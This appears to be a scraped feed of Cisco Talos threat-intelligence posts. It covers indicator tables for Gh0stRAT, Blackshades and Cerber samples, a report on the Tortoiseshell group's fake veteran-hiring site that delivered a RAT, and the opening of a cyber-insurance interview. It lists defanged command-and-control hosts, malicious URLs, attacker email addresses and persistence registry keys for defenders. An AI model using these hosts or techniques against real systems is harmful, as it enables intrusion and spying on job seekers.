                053be505a2b2522fad8b7cb71f5bd04968cfb3ad5e77ad50eac80c71b9ad646d 06de4bdfc758de6336022f8301d692dcc17acbfc9663b367df86a02d528f2b90 09af6f559bcb42c006c0efc09f52dd592f459786c39780679d9d779998b6ecfd 0d2d5ff847cb20067e4213d78dcdf7aaa1c62546dcb00137b087d81703abddcc 21cc6498a5a9cecd5d0c3e94bddd4b182b8db1109268f7be061205fbdb91dfaf 2c1376de5d487cb0ea7be8b0f2710e3b205402bb78f20107a89711f8772120ac 3680339a0a4a8c411134b56dd25beb82b86e49e344d569beadd731d4e76d9cb5 3b24eaa42329d6abf6ce19c41738062797a2515122254b527fd5aec792723db6 3d16bedb9905e2ea113ccf8867502bb1b24d712234ef5a54257b8b3206e27479 43537dfd0609351d2e8d2e858aace8b0fb9ba89d301017a233fbd407f2ad39bd 455bf07f30cce22c8e45801258ea6ca480daed4537f50b2260bb372e784d6eaa 5458977721ca062b9d061190c01da20afc30e616b8264a9e88ef394039c476ed 5d4531531c698fa163199ee68a34661a212b69a93f43eff6d510e85f8663755c 6687eac3a15cb4e0e070ea5a72888644bfe05093e1e30a49b4e0a2a5a29d3d63 67b6cef58b9a052e1ae7994c930014a2ab045c3c7d856896747ceb3bff454c10 6fe8a7c6f231c9c8508879c983583810ea137d022b2d5b17b0213609f8a2f3e0 74f31384ed882520d99460a4583074e2269d3546f30fd08500a671e47f71519b 84e3298502bfa5ddfddc71f014eef7796ad4d1e11b5e40c52a65d3ac04771197 867bb45649adc9f5952e8944c0a4a2f256ed0875f52bd431212f5ade82d240f3 95ab1ac088f7be7dd71ecb6ea5c5923f4adbb05bd9480623ec788d6688ebae71 95cb3bbabe9d01355f0363f341b1a8d0d56b485e2b62c1111a0f68839c7d9c2e a0a861ff5549335dc76f9fd837e20073e23a2298b7e025615dfdbf0e00b0a91d a551656a575421e4cb87a7598846ab9436fb0bc7d9c7869edc8a4ca5d65ec105 b1aa0afb11da754c88e496a081982394a1ff8e6be6de0e54a11e27681095f8b1 beb20991985d1f3ea8654fdfb1e45824eed71a0abdff34ee1e3963a140a606ed
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                Wsa N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Trojan.Gh0stRAT-7170222-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Update_win
                29
                MutexesOccurrences
                sanshuigood.vicp.cc3
                222.186.56.113
                rj.17caobi.com2
                23.238.196.112
                222.186.34.2001
                \BaseNamedObjects\103.249.28.411
                \BaseNamedObjects\174.139.211.141
                \BaseNamedObjects\174.139.208.541
                59.13.211.1611
                67.229.57.2281
                27.255.80.2061
                220.70.90.331
                rj.dxjav.com1
                117.52.14.1521
                67.198.139.2061
                67.229.224.821
                121.78.158.391
                loloyasumi.com1
                100.43.130.1301
                98.126.240.1141
                184.83.6.2051
                174.139.208.511
                183.86.218.1381
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                61[.]142[.]176[.]233
                222[.]186[.]56[.]113
                23[.]238[.]196[.]112
                216[.]218[.]206[.]691
                222[.]186[.]34[.]2001
                103[.]249[.]28[.]411
                174[.]139[.]211[.]141
                174[.]139[.]208[.]541
                59[.]13[.]211[.]1611
                67[.]229[.]57[.]2281
                27[.]255[.]80[.]2061
                220[.]70[.]90[.]331
                117[.]52[.]14[.]1521
                67[.]198[.]139[.]2061
                67[.]229[.]224[.]821
                121[.]78[.]158[.]391
                100[.]43[.]130[.]1301
                98[.]126[.]240[.]1141
                184[.]83[.]6[.]2051
                174[.]139[.]208[.]511
                183[.]86[.]218[.]1381
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                sanshuigood[.]vicp[.]cc3
                rj[.]17caobi[.]com2
                rj[.]dxjav[.]com1
                loloyasumi[.]com1

                File Hashes

                0235f44dcc192d4a9388c9a209a8e28197be43afe382cd089b2445f15c4bfc7b 03e1d03b7ecc4dc2a4f781b83fb1d0677e885b995b96da937789ba594dfa6ba6 098522455fe96579b43408f37111f6064e2b564ff69e94f9808e01722e868c00 0b4a4f248629b27f3929e4a11186c35448c86921bd913dd5847a2c60ce430985 0f165051f607a0f289a8d9af17dec51cc9074134b70a766ae98293d08c8ae230 10609c1a910e9e71107cde6a3dc6f6ebcda7c2cb2a5775fe4e0217953f87c690 1d7dfe543d4ca35cfb162bf01e452c31240db8caa4452bb0fe5d382e730817d4 24bd88c9de5d9d09dc42a6b7338deb060c8444c1b57918a32d43739fa255247b 24fda94cdc7eb56af6fb5e6c39a85d9f80a1d622c4e3e5627bf30445b6b3a603 28bfbe60ce5013709c6e66d2aa96391dd260bdc3d6d7aa4dcd947ac79351a9e0 28c1255d7261e13d6a0f380267d43e190b1c54da127667591cda45844266265e 33d1367a9864cd8704db52626a5ff24d84ac74efd1414c371516b49a2bf73cb3 382ab955b1af78fba82e1209e6d61328d3100cb65f13be24615630dddf55af1a 383fed33d04f113938f2c21df9c7387e616ad4b528cb8d4dd6d0f8192ace729d 384583ac629ffbcb7a55da44910dd23cd380ce788bfae201c7ede3189959619f 38857b2a7f68193292de188f5ae07a1dc20cc8d9616a8fcfc8d7e56c9cb1342b 39027866667d05c74a96c42d98cd08b90a8f78dcfd88d3f28265a2dc5f1d1b7c 3b93d4215f033ae31063f5a790d6a139925a0e3a15f9e5ff32bf85b852eebcca 3c7c883d9cbfe7f0dc2a600e845becde9bf87898651ae475654fd79d37df5589 4bb16a15be32eb06a514619e851cca7a89b0e990c678192cd0a6329ac04dab5d 4c30fef1e3bb90050f8c874b92857e223179214a3c2e566da2c44dbf8b500d90 4c322440da73cf7b1152f3d62729cb4d8c2d8cefe8403743ca53283c33955689 51557a7629fe983488ac73c79717b97223c0babd9319916c3fbd575400eb09f0 51ae9265a88cf455a3143c022eea1e41038d3617f964ebf3f58310a9dfbacc33 68a9bf919b38f938938062e22852a3adebcca10973db9eb8172ee0e40e80fa34
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WsaThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella




                Win.Packed.Blackshades-7168564-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
                Value Name: DoNotAllowExceptions
                67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\INSTALL 67
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS 67
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\SRVID 67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\SRVID\ID 67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\INSTALL\DATE 67
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
                Value Name: Microsoft/HKCU
                67
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Microsoft/HKCU
                67
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Microsoft/HKCU
                67
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE}
                Value Name: StubPath
                67
                <HKCU>\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE}
                Value Name: StubPath
                67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\SRVID\ID
                Value Name: 5FHDOAPLOK
                67
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\Users\Administrator\AppData\Roaming\Adobe.exe
                67
                <HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\INSTALL\DATE
                Value Name: 5FHDOAPLOK
                67
                <HKCU>\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} 66
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} 65
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS
                Value Name: StubPath
                3
                <HKCU>\SOFTWARE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS
                Value Name: StubPath
                3
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS 2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\TEMP\1a461072aa3e19bc429aa83c49ea31c7722213865cf50a6937b62776a54d8a7b.exe
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\TEMP\0cf04b4b65e7726e9d7d54f88299c4f1bbcad8aed4b586477c1bd7a48d21f318.exe
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\TEMP\1c5fa3c699edc2528a14eb7763db3064fdf8ea90e6d35c5bba8f82f786d995d5.exe
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\TEMP\3954af7bdbe570ff5c6fc1b7776b387a8b3a3d3bb57b0e187a9f4829b51c51cd.exe
                1
                MutexesOccurrences
                5FHDOAPLOK67
                \BaseNamedObjects\5FHDOAPLOK_pers35
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                212[.]117[.]50[.]22867
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                c2upfront[.]no-ip[.]info67
                3c2upfront[.]no-ip[.]info67
                2c2upfront[.]no-ip[.]info67
                1c2upfront[.]no-ip[.]info67
                5c2upfront[.]no-ip[.]info36
                7c2upfront[.]no-ip[.]info36
                4c2upfront[.]no-ip[.]info36
                6c2upfront[.]no-ip[.]info36
                Files and or directories createdOccurrences
                \Autorun.ini67
                E:\Autorun.ini67
                %APPDATA%\Adobe.exe67
                %TEMP%\vbc.exe67
                %APPDATA%\Player67
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32925889681
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32994790951
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1184.32994877071
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32994903591
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.948.32994884401
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32994978471
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32994975971
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1184.32995075501
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32995069881
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32995067541
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32995156311
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1976.32995154281
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1568.32995255521
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.744.32995256931
                %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1704.32995357391

                File Hashes

                0061fdd7beb58e2d98dd6425c4467fabf84ee3261deed1ee41b3f09db77a3003 0103e022c0a56da31a998dab5f276be4bfa77e4b45e19d7e274e3ebfc6011794 020b795dc30a29af90cdf3d90213c74a9c1b18842077f48dc1cc824eefe52938 0435e4e9698ecdb041f392ee1e46204c64fa79151b028b9b3a938914a6348f7a 0444890807a5e1d7118896a2de574dd6ed48a0739ce371530ee15181336fe8ac 0581cf5e05f6f3a2148a8182cc6c753397d86eca85515c746a039a043c0156d3 0685f82e2301864e164b8ef4fb8e1f8a01540b3a87e5ca2b632be9b080446b9b 0835583f69abb28340d430ecc408e423c424a24a72a3a58e94a674e8a6880359 08c924b472ee439d357a811a209dac18bd337f5525d44c4a988158b51fb09feb 09898e7c85ce10d9f9e1d02c839b7b1b2c1a95826857854728b59548d0ea12f9 09a2f347ea8ca01153a1f53f668efcea8a85d98789abe0f4aebbbe83c72aed8c 09d34805c6ef60df465377aa7303c3edd19616aa3feba7051d8142f7020fc475 09d87c515a293798b1422625098e5a150c95e9a77e9b4f0207a9d3403fba1978 0a15b2293f794209b5190b12606d59fad342aa183d6a88aa841a70959cd5baf6 0bf4cdc4b180c5c4ceca11cb86be76a19a125ef097b94775a7f7c6b93d0d422f 0bf65a3c05256cb7fa901cfba4382f43032768c664dfab225ef504eda8b2667e 0c09b71359ae1c7358707eda957ae9e821d25e9c54ee9fba0d98a6cf22dcc77d 0c0e8ae82bff3013c7078798f6a9385262f42b27cdf6b89fe86e99aaaf49bd78 0c16e1bc2eece1ba2c3f590f7ea6a3cd32ae0cea789c6a2a066e85659b969107 0cb8b3dec2d52544e2adaf0e8be5765defaf8196fa93066d05f2e9db3ba0df5a 0cf04b4b65e7726e9d7d54f88299c4f1bbcad8aed4b586477c1bd7a48d21f318 0df2f3957a2a7793193ebcac0bd50db52c87f1062d41cb223dd621bbbe91362b 0f7d9402bc26786b576b5fdb6b60904f509bc643edd70ef3278652b7a716591d 0fbd9df4815f16405436ac36d5fe99ac0ae847cf3c0588534cd07d58bb918729 0fbe434942613ae5c6ea47d8abe73c86e898c6af97d89e802bb3ba5e5efc6647
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                Wsa N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Ransomware.Cerber-7168312-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 116
                <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
                Value Name: PendingFileRenameOperations
                116
                MutexesOccurrences
                shell.{381828AA-8B28-3374-1B67-35680555C5EF}116
                \BaseNamedObjects\shell.{CA0E5370-75D1-0D8C-179E-782353EA1E4D}16
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                178[.]33[.]163[.]254116
                178[.]33[.]162[.]254116
                178[.]33[.]160[.]254116
                178[.]33[.]161[.]254116
                178[.]33[.]160[.]224116
                178[.]33[.]160[.]240116
                178[.]33[.]162[.]192116
                178[.]33[.]158[.]0116
                178[.]33[.]159[.]0116
                178[.]33[.]160[.]0116
                178[.]33[.]160[.]128116
                178[.]33[.]160[.]192116
                178[.]33[.]160[.]248116
                178[.]33[.]160[.]252116
                178[.]33[.]161[.]0116
                178[.]33[.]161[.]128116
                178[.]33[.]161[.]192116
                178[.]33[.]161[.]224116
                178[.]33[.]161[.]240116
                178[.]33[.]161[.]248116
                178[.]33[.]161[.]252116
                178[.]33[.]162[.]0116
                178[.]33[.]162[.]128116
                178[.]33[.]162[.]224116
                178[.]33[.]162[.]240116
                *See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                api[.]blockcypher[.]com116
                bitaps[.]com79
                chain[.]so79
                BTC[.]BLOCKR[.]IO79
                hjhqmbxyinislkkt[.]1j9r76[.]top37
                bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com16
                Files and or directories createdOccurrences
                %TEMP%\d19ab989116
                %TEMP%\d19ab989\4710.tmp116
                %TEMP%\d19ab989\a35f.tmp116
                %TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp116
                %TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp116
                <dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt116
                <dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta116
                <dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)16

                File Hashes

                0829786ae40c18d826631865dbd36bc72a5bf83855657316fa7b08221ff0f5cc 0e53d248a1e595deacef928a940792265e8f9e6e19aeedd6f15e9d3e77151ca3 0f1c4d1e75c4299391acc42ee6aeb7c37f662f49ddded5cda67b65e77c994590 116624dbb1103e20eb32786253daa919157862965ecee4a681ea6618b745297a 142a504ded2285194cc6d8a0d22ed667bb7e6755482b5a3781d21cff28a49f0c 166a7b7eb006ea685202b6fb866405290a8d881b1f17d8a713a8fba6019edf3a 1a21029006cd625a8eadf49354e1717d43d657eb185e905992a0b973813fe860 1ab97328ebfdaef12899218b558c1f0ec30495262794d0f6b4f4546aaa5e7e85 1d6782e87dbc95c0639bc44cd05bb172be993af6ba6cd5365f22f3e350a9f504 1ef0774c485c4921846551f9b2238804925ddb85fe9383202f94d313f8775528 220748f24923783182a2120dcd5a24799e799d13678ad58a117b064fe9f32d49 2424a1e17d890329fcb2926c40584a7f335cdcb6870f05eff82e2282fae8a3b4 24578d9dfad55c280b363ee5a37f71a1aa2f5cd1388dcc67097caf03ec973782 25e96af9b71863c16e25f18ef627347aab568f190fc71956fa63553f2b2f65a2 274fbe5faac90ea5ffef8e7b4b9da60642f040194c28dce7de4f9c30b92a7b07 2df15738f5c6d25d23d54d5d74d8ade3eea927152c3cad6307de580397d8b56f 301e0d38d0bac986fe185ab4e420a623bbbbf9103d767950a3dd678111354a8b 37b913abb385ae596b98a0366e4b33fac6e5dc6423bff07375e210774dd6d1ca 382b8aac516f52bcba3ca0dadae42e550e54bd18fee696d732aa59687c388992 38d4098a18344443ad15805810ba895ceefaf05be83f8ac2f53ea2f69ae7745d 3a523bb773df8f955d0ca81ee411b044692d8c24793cdaba348c2505fddcba09 3cc7d8e616d84ec21af5a3c60348f101a53c0a09257d0fdb4d7d15a4268e6330 3ff2ab9bdbfcc01eb114bf8cfa9ebb6b222b0572eddefb7b09b31e78a99bcdec 412f050b6b171f08875aa4ee5e54a0ec5b263cef01e27debc47324342f6ae188 42bff53fe89ff3b4bc908bfb53fbcb6dda006fed7d6cfb9ab04ce84dbd62f9c2
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                Wsa N/A

                Screenshots of Detection

                AMP


                ThreatGrid



                Malware




                Exploit Prevention

                Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
                CVE-2019-0708 detected - (11771)
                An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
                Process hollowing detected - (2431)
                Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
                Excessively long PowerShell command detected - (2353)
                A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
                Madshi injection detected - (1796)
                Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
                Kovter injection detected - (1465)
                A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                Trickbot malware detected - (688)
                Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
                Gamarue malware detected - (170)
                Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                Installcore adware detected - (95)
                Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
                Dealply adware detected - (46)
                DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
                Fusion adware detected - (44)
                Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware.

                How Tortoiseshell created a fake veteran hiring website to host malware

                $
                0
                0


                By Warren Mercer and Paul Rascagneres with contributions from Jungsoo An.

                Introduction

                Cisco Talos recently discovered a threat actor attempting to take advantage of Americans who may be seeking a job, especially military veterans. The actor, previously identified by Symantec as Tortoiseshell, deployed a website called hxxp://hiremilitaryheroes[.]com that posed as a website to help U.S. military veterans find jobs. The URL is strikingly close to the legitimate service from the U.S. Chamber of Commerce, https://www.hiringourheroes.org. The site prompted users to download an app, which was actually a malware downloader, deploying malicious spying tools and other malware.

                This is just the latest actions by Tortoiseshell. Previous research showed that the actor was behind an attacker on an IT provider in Saudi Arabia. For this campaign Talos tracked, Tortoiseshell used the same backdoor that it has in the past, showing that they are relying on some of the same tactics, techniques and procedures (TTPs).

                Fake veteran hiring website


                The fake website, called "Hire Military Heroes" (hxxp://hiremilitaryheroes[.]com/), which immediately goes after veterans with an image from the movie "Flags of our Fathers."


                The website is only composed of three links to download a desktop app for free. The app is a fake installer. Contrary to standard malware installers, this one does not need to be silent, as the user expects an installation. Here's a look at the user interface, and the error message is always displayed to suggest something has "stopped" the app from accessing its database.



                The progress bar almost fills up entirely, and then displays an error message:


                The installer checks if Google is reachable. If not, the installation stops. If it is reachable, the installer downloads two binaries from hxxp://199[.]187[.]208[.]75/MyWS.asmx/GetUpdate?val=UID:



                The downloaded binaries are stored in base64. One of the binaries is a tool used to perform a reconnaissance stage on the system and the second is the Remote Administrative Tool. The RAT is executed as a service. The installer installs the service first (for the -install argument) and then stops/starts the service with the command and control (C2) server IP in argument:



                If something fails during the installation, an email is sent to the attacker. The credentials are hardcoded in the installer. The email account is ericaclayton2020@gmail[.]com and the error email is sent to marinaparks108@gmail[.]com.

                Reconnaissance phase


                The downloaded reconnaissance tool is named "bird.exe" on the system and the internal name is Liderc. Liderc is a unique supernatural being of Hungarian folklore. The original form of this creature is a chicken, that would explain the name of the dropped PE on the system, "Bird.exe."

                The purpose is to collect a lot of information on the victim machine:








                The attacker retrieves information such as the date, time and drivers. The attacker can then see information on the system, the patch level, the number of processors, the network configuration, the hardware, firmware versions, the domain controller, the name of the admin, the list of the account, etc. This is a significant amount of information relating to a machine and makes the attacker well-prepared to carry out additional attacks. The attacker even gets the size of the screen by using WMI, which is potentially a trick to identify if the system is a sandbox.

                All this information is sent by email by using the same emails:



                Remote access tool


                This actor also deploys a RAT named "IvizTech" on the system. The code and features are similar to the ones outlined by Symantec. The IP is put in argument to the service. The attackers hoped that this would make it impossible to get to the C2, as the installer is needed — you can't just get there with the RAT itself. This allows an attacker to have a malware that they can add modules onto (no need to recompile when you want to update the C2). Requiring the installer also could make it more complicated for researchers to access the C2 and get hands-on analysis of the malware.

                The malware has four features:

                • kill_me: It stops the service and removes the malware
                • Upload: It downloads a file on the internet
                • Unzip: It uses PowerShell to unzip and execute code on the system
                • And finally, the malware can execute a command

                Conclusion


                This new campaign utilizing the malicious hiring website represents a massive shift for Tortiseshell. This particular attack vector has the potential to allow a large swath of people to become victims of this attack. Americans are quick to give back and support the veteran population. Therefore, it's this website has a high chance of gaining traction on social media where users could share the link in the hopes of supporting veterans.

                At the time of publication, we do not have a method of distribution used, nor do we have proof of this existing in the wild. The level of sophistication is low as the .NET binary used has poor OPSEC capabilities, such as hard-coded credentials, but then other more advanced techniques by making the malware modular and aware that the victim already ran it. There is a possibility that multiple teams from an APT worked on multiple elements of this malware, as we can see certain levels of sophistication existing and various levels of victimology.

                Coverage


                Intrusion prevention systems such as SNORT® provide an effective tool to detect Tortoiseshell activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

                Additional ways our customers can detect and block these threats are listed below.



                Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

                Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                IOCs


                Network


                hxxp://199[.]187[.]208[.]75/MyWS.asmx/GetUpdate?val=H7ddew3rfJid97fer374887sdnJDgsdte
                hxxp://66[.]42[.]78[.]193/response/
                hxxp://66[.]42[.]78[.]193/statement/
                hxxp://hiremilitaryheroes[.]com/

                Samples


                Installers:

                c121f97a43f4613d0a29f31ef2e307337fa0f6d4f4eee651ee4f41a3df24b6b5
                2a9589538c563c006eaf4f9217a192e8a34a1b371a31c61330ce2b396b67fd10
                55b0708fed0684ce8fd038d4701cc321fe7b81def7f1b523acc46b6f9774cb7b

                Reconnaissance PE:

                ec71068481c29571122b2f6db1f8dc3b08d919a7f710f4829a07fb4195b52fac

                RAT:

                51d186c16cc609ddb67bd4f3ecd09ef3566cb04894f0496f7b01f356ae260424

                Additional IOCs related to this actor


                41db45b0c51b98713bc526452eef26074d034b2c9ec159b44528ad4735d14f4a
                78e1f53730ae265a7eb00b65fbb1304bbe4328ee5b7f7ac51799f19584b8b9d4
                46873290f58c25845b21ce7e560eae1b1d89000e887c2ff2976d931672390dd8
                f31b5e14314388903a32eaa68357b8a5d07cbe6731b0bd97d2ee33ac67ea8817
                f1c05ff306e941322a38fffb21dfdb5f81c42a00a118217b9d4e9807743d7275
                1848f51d946fa8b348db8ef945a1ebff33ff76803ad26dfd175d9ea2aa56c7d0
                ed150d9f6e12b6d669bcede3b7dc2026b7161f875edf26c93296e8c6e99152d5
                2682328bde4c91637e88201eda5f5c400a3b3c0bdb87438d35660494feff55cf
                e82a08f1514ccf38b3ae6b79e67d7605cb20b8377206fbdc44ddadfb06ae4d0d



                185[.]43[.]108[.]134
                162[.]220[.]55[.]249

                Spreadme[.]international

                "You rock" installer snippet:



                An in-depth look at cyber insurance: We sat down with risk expert, Cisco's Leslie Lamb

                $
                0
                0
                Y2K is known for being one of the most widespread times of panic in IT. It was generally thought that on Dec. 31, 1999, computers across the globe would shut down when they would fail to properly process that it would become the year 2000 the next day.

                It made headlines across the globe, sent everyone with a computer into a panic and even led to the creation of several U.S. government task forces to prepare for the problem.

                But what you may not know is that Y2K spawned the birth of cyber security insurance.

                In the buildup of panic, companies became worried that they would lose all their information stored on computers or would lose all ability to operate come Jan. 1, 2000. It was around this time that companies and organizations started to consider mitigating the risk regarding computers and digital storage.

